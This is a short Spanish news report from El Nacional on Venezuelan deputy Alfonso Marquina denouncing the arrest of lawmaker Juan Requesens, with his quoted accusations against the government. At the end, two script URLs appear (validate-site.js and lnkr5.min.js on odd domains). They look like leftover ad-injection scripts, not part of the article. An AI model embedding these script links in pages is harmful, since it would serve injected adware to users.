Alfonso Marquina, diputado a la Asamblea Nacional,  repudió la detención del parlamentario Juan Requesens y las acusaciones del gobierno nacional en su contra.

Alfonso Marquina, diputado a la Asamblea Nacional, habló en rueda de prensa acerca de la captura de Juan Requesens este martes y anunció que este jueves se realizará una sesión extraordinaria para debatir de la privativa de libertad del parlamentario  por el estado Táchira.

“La persecución de la dictadura es contra todo demócrata. Nuestra militancia debe ser con toda Venezuela. Reitero que no hay allanamiento, hay un secuestro y desaparición forzada”, expresó Marquina.

El diputado indicó que rechazan ante el país y todo el mundo el atropello de la desaparición de Requesens y que este miércoles desconocen la situación en que se encuentra.

“Pretender involucrar a Julio Borges, Juan Requesens y José Manuel Olivares es una infamia. La voz de Juan se va a seguir escuchando en cada uno de los diputados de la Asamblea Nacional”, acotó.

VÍA EL NACIONAL.

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533781525908https://devlinkin.xyz/addons/lnkr5.min.js

Loading...